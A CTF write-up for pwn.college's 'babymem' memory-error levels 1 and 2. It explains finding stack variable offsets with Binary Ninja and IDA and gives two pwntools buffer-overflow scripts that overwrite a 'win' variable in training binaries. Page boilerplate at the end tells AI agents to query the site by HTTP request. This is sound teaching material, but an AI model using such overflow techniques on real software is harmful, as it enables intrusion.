> For the complete documentation index, see [llms.txt](https://ret2basic.gitbook.io/ctfwriteup/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ret2basic.gitbook.io/ctfwriteup/web2-ctf/pwn.college/memory-errors/babymem.md).

# babymem

## Notes

### Binary Ninja

Binja High Level IL has its own syntax. It is a C-like language, but you can't assume it is just C. I recommend reading the [documentation](https://docs.binary.ninja/dev/bnil-overview.html#reading-il) to avoid confusion.

### Binary Ninja vs. IDA

The course itself recommends binja, but I recommend IDA, period. You will know why after you work through all the challenges.

### Renaming

A huge part of this chapter is finding offsets of different variables. If you would like to do it the static analysis way, renaming these variables would help a lot.

### Remote vs. Local

If you download the binary to your local machine, the relative offsets inside the binary stay the same. That is, you can use whatever tools you want on your local machine to find those offsets. You don't have to do everything on the remote machine.

## Level 1

### Teaching Level

![Level 1](https://i.imgur.com/7D57n3f.png)

### Solution 1: Binja

To overwrite the `win` variable, first we need to figure out where the input buffer and the `win` variable locate in memory. In binja, I recommend the following workflow:

* **Step 1:** Read **linear high level IL**, find key variables and rename them. In this case, we look for `buffer` and `win`.
* **Step 2:** Switch to **disassembly** and look for renamed variables. Jot down their offsets.

Read the linear high level IL of the `vuln()` function and rename variables:

![Linear High Level IL](https://i.imgur.com/M6BfoAF.png)

Switch to disassembly and look for `buffer` and `win`:

![Disassembly](https://i.imgur.com/fyzx9iZ.png)

### Solution 2: IDA

In IDA, things are even easier. First we name the `win` variable:

![Rename](https://i.imgur.com/X5qYHwY.png)

The offset relative to rbp can be found in the variable declarations:

![Offset](https://i.imgur.com/cEoYwzo.png)

The downside is that IDA does not recognize all the function names, so I still recommend binja for this chapter.

### Exploit

```python
#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="amd64", os="linux")
elf = ELF("/babymem_level1_testing1", checksec=False)

#--------ret2win--------#

offset = 0x20

payload_size = "33"
payload = flat(
        b"A" * offset,
        "B",
)

p = elf.process()

p.sendlineafter("Payload size: ", payload_size)
p.sendlineafter(f"Send your payload (up to {payload_size} bytes)!\n", payload)

p.interactive()
```

## Level 2

### Teaching Level

![Level 2](https://i.imgur.com/O88mFj9.png)

### Solution

The offsets are not easy to find for this level. Instead, we just spam enough `A`'s so that the `win` variable on the stack is overwritten.

### Exploit

```python
#!/usr/bin/env python3
from pwn import *

#--------Setup--------#

context(arch="amd64", os="linux")
elf = ELF("/babymem_level2_testing1", checksec=False)

#--------ret2win--------#

payload_size = "1024"
payload = flat(
        b"A" * 1024,
)

p = elf.process()

p.sendlineafter("Payload size: ", payload_size)
p.sendlineafter(f"Send your payload (up to {payload_size} bytes)!\n", payload)

p.interactive()
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ret2basic.gitbook.io/ctfwriteup/web2-ctf/pwn.college/memory-errors/babymem.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.